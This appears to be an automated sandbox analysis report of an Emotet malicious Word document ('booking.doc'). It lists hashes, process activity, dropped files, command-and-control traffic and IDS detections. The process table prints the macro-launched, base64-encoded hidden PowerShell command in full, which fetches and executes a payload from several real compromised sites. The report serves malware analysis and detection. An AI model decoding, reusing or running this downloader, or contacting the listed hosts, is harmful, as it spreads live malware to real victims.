File name: | booking.doc |
Full analysis: | https://app.any.run/tasks/7e7acdf7-e527-47c1-aa37-44161abc2ec4 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 16, 2019, 09:28:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Dolore sunt a., Author: Laura Brehmer, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Nov 15 21:33:00 2019, Last Saved Time/Date: Fri Nov 15 21:33:00 2019, Number of Pages: 1, Number of Words: 21, Number of Characters: 121, Security: 0 |
MD5: | 45CF8F0BC99856BC508DF2242BF08DB1 |
SHA1: | 8539C7075E7060946E5774779429F0ADCEE08170 |
SHA256: | D115EB3832178142E9A59F565E63729F54E110CC963DC7F10B95F5BEFF943CB7 |
SSDEEP: | 3072:cxTyQH+UaqFh5Br/SzFaSadGBrjC48+WZ/POhh+/+qls5nIo:cxTyQHNaqjSzGdD48+aPOnX8s5n3 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Dolore sunt a. |
---|---|
Subject: | - |
Author: | Laura Brehmer |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:11:15 21:33:00 |
ModifyDate: | 2019:11:15 21:33:00 |
Pages: | 1 |
Words: | 21 |
Characters: | 121 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 141 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 25 |
CompObjUserType: | Microsoft Forms 2.0 Form |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1892 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\booking.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2332 | powershell -w hidden -enco JABPAGsAcQBoAHEAcQB5AGwAZQB1AHoAYwB5AD0AJwBOAGUAYQBqAHIAegBhAGoAaQB3AG8AdgBvACcAOwAkAEgAbwBsAHgAbABtAG0AZwAgAD0AIAAnADcAOQAwACcAOwAkAEIAZABwAHAAbwB2AHAAawBiAGIAagBjAD0AJwBFAHEAdAB5AHgAaQBtAHcAJwA7ACQAWQBtAHcAYQByAGEAdQBnAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABIAG8AbAB4AGwAbQBtAGcAKwAnAC4AZQB4AGUAJwA7ACQATwBiAGgAbABiAHYAawBxAGoAYQB4AHoAaQA9ACcAUgBwAHEAaQBwAHAAeQBnAGgAcgAnADsAJABLAG8AbQBpAGcAdAB3AHEAegBrAHQAeAA9ACYAKAAnAG4AZQAnACsAJwB3AC0AJwArACcAbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBFAHQALgB3AGUAYgBjAEwASQBFAG4AdAA7ACQATQBjAGgAdgBuAHYAeAB6AGIAYQBiAD0AJwBoAHQAdABwAHMAOgAvAC8AcwB1AGEAcgBlAHoAYwBvAHIAcgBlAGQAbwByAGUAcwAuAGMAbAAvAGMAZwBpAC0AYgBpAG4ALwBrAFoAWABVAHgAWAAvACoAaAB0AHQAcABzADoALwAvAHcAYQB0AGUAcgAtAGMAbwBvAGwAZQBkAC0AYwB5AGMAbABlAHMALgAwADAAMAB3AGUAYgBoAG8AcwB0AGEAcABwAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBOAE0ASAB4AEcAagAvACoAaAB0AHQAcABzADoALwAvAGEAawBjAGEAbgAtAHQAdQByAGkAegBtAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB3AHoAdgBvAGkALQBoAGkAZQA2AHcAbgBwAHkAdwBlAC0AMgA4ADUANQA0ADEAMgA5AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AYgBpAGQAYQAxADIAMwAuAHAAdwAvAHQAZwA5AHcALwAzAGYAOAAtADYAdQBmADMAZAA2AGsAZgBvAGUALQAzADQANgAwADEANQAyADkALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB5AGkAbgBxAGkAbABhAHcAeQBlAHIALgBjAG8AbQAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwBqAGgAbwAtAHgAbgAwAHEALQAwADEAMgAwADkANQAzADcAOQA0AC8AJwAuACIAUwBwAEwAYABpAHQAIgAoACcAKgAnACkAOwAkAFAAdwBtAGkAZgBnAHEAYgA9ACcARQBpAGcAcgBzAHQAYwBkAGYAaAByACcAOwBmAG8AcgBlAGEAYwBoACgAJABIAGcAagBkAGQAaABsAGYAaQBoAGkAcwAgAGkAbgAgACQATQBjAGgAdgBuAHYAeAB6AGIAYQBiACkAewB0AHIAeQB7ACQASwBvAG0AaQBnAHQAdwBxAHoAawB0AHgALgAiAGQAYABvAGAAdwBgAE4AbABvAGEAZABGAGkATABlACIAKAAkAEgAZwBqAGQAZABoAGwAZgBpAGgAaQBzACwAIAAkAFkAbQB3AGEAcgBhAHUAZwApADsAJABUAHcAbwBpAGoAcAB1AHoAdAA9ACcAVgB1AHcAcgByAHMAcwBiAHgAYwBsAGgAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACAAJABZAG0AdwBhAHIAYQB1AGcAKQAuACIAbABlAGAATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMQA2ADAAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYABBAHIAVAAiACgAJABZAG0AdwBhAHIAYQB1AGcAKQA7ACQARQBlAGUAbQByAGsAYgBxAHQAbAByAHkAaAA9ACcATwBrAGcAbQB3AHkAdwBrAGwAbQBvAHAAJwA7AGIAcgBlAGEAawA7ACQASABwAGwAawBtAGwAcQB2AD0AJwBKAHUAZABjAGcAYQB1AGwAcQBmACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAcABiAHkAaQB1AHMAegA9ACcASwBuAGwAdwBmAG4AdQBhAGIAdABjAHYAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3884 | "C:\Windows\system32\taskmgr.exe" /4 | C:\Windows\system32\taskmgr.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Task Manager Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1916 | "C:\Users\admin\790.exe" | C:\Users\admin\790.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1904 | --4c25e06c | C:\Users\admin\790.exe | 790.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1096 | "C:\Windows\system32\taskmgr.exe" /1 | C:\Windows\system32\taskmgr.exe | taskmgr.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Task Manager Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2420 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 790.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
792 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | serialfunc.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
776 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | explorer.exe | |
User: admin Integrity Level: HIGH Exit code: 0 | ||||
2960 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | serialfunc.exe |
User: admin Integrity Level: HIGH Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA989.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2332 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LEY6PE5GSSD8KTLSF23L.temp | — | |
MD5:— | SHA256:— | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF54138A0BEBDBB284.TMP | — | |
MD5:— | SHA256:— | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFD45E5BDB595C7496.TMP | — | |
MD5:— | SHA256:— | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFE756E671A6915448.TMP | — | |
MD5:— | SHA256:— | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FFA03CD3-2336-439E-8D62-C45CCD9FDBE4}.tmp | — | |
MD5:— | SHA256:— | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFD3925797D5BFE187.TMP | — | |
MD5:— | SHA256:— | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{70DBE3C5-8762-4A1D-B087-6A3122B52C4D}.tmp | — | |
MD5:— | SHA256:— | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:2455C15589843C2EAC35FCC061519C34 | SHA256:BC568529570B0DE768C51D903FF633EE4D7AF0B68F2109CC33CC6585744D0712 | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\659D5A9.wmf | wmf | |
MD5:F66A5CB55DC953CEE945382BB4220A3D | SHA256:3A2D4B95C3DDA1E58CD02B6F157871DEE010C00CB6495D191EC069A3F6A9F21E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4032 | chrome.exe | GET | — | 195.21.56.7:80 | http://195.21.56.7/devices | GB | — | — | unknown |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/ | RU | — | — | malicious |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/stubs/guids/ | RU | — | — | malicious |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/favicon.ico | RU | — | — | malicious |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/stubs | RU | — | — | malicious |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/favicon.ico | RU | — | — | malicious |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/favicon.ico | RU | — | — | malicious |
2484 | chrome.exe | GET | 200 | 195.201.56.70:80 | http://195.201.56.70/favicon.ico | RU | — | — | malicious |
792 | serialfunc.exe | POST | 200 | 195.201.56.70:80 | http://195.201.56.70/devices/ | RU | binary | 132 b | malicious |
4032 | chrome.exe | GET | 200 | 103.2.116.76:80 | http://r1---sn-f5p5-hxae.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOTRmQUFXVHlhaGJaUTdMLWtCSkNJUl9ZQQ/1.0.0.5_nmmhkkegccagdldgiimedpiccmgmieda.crx?cms_redirect=yes&mip=85.203.20.5&mm=28&mn=sn-f5p5-hxae&ms=nvh&mt=1573896439&mv=m&mvi=0&pl=25&shardbypass=yes | AU | crx | 293 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2332 | powershell.exe | 138.117.149.13:443 | suarezcorredores.cl | Gtd Internet S.A. | CL | suspicious |
4032 | chrome.exe | 216.58.205.227:443 | www.google.com.ua | Google Inc. | US | whitelisted |
3100 | serialfunc.exe | 195.201.56.70:80 | — | PP Podilsky Intelectualni sistemy | RU | malicious |
4032 | chrome.exe | 172.217.18.110:443 | ogs.google.com | Google Inc. | US | whitelisted |
792 | serialfunc.exe | 195.201.56.70:80 | — | PP Podilsky Intelectualni sistemy | RU | malicious |
4032 | chrome.exe | 172.217.22.106:443 | fonts.googleapis.com | Google Inc. | US | whitelisted |
4032 | chrome.exe | 172.217.21.238:443 | clients2.google.com | Google Inc. | US | whitelisted |
4032 | chrome.exe | 172.217.16.163:443 | fonts.gstatic.com | Google Inc. | US | whitelisted |
4032 | chrome.exe | 216.58.208.45:443 | accounts.google.com | Google Inc. | US | whitelisted |
2332 | powershell.exe | 145.14.145.152:443 | water-cooled-cycles.000webhostapp.com | Hostinger International Limited | US | shared |
Domain | IP | Reputation |
---|---|---|
suarezcorredores.cl |
| suspicious |
water-cooled-cycles.000webhostapp.com |
| shared |
clientservices.googleapis.com |
| whitelisted |
accounts.google.com |
| shared |
www.google.com.ua |
| whitelisted |
fonts.googleapis.com |
| whitelisted |
www.gstatic.com |
| whitelisted |
fonts.gstatic.com |
| whitelisted |
apis.google.com |
| whitelisted |
ogs.google.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
2332 | powershell.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com) |
792 | serialfunc.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
792 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3100 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |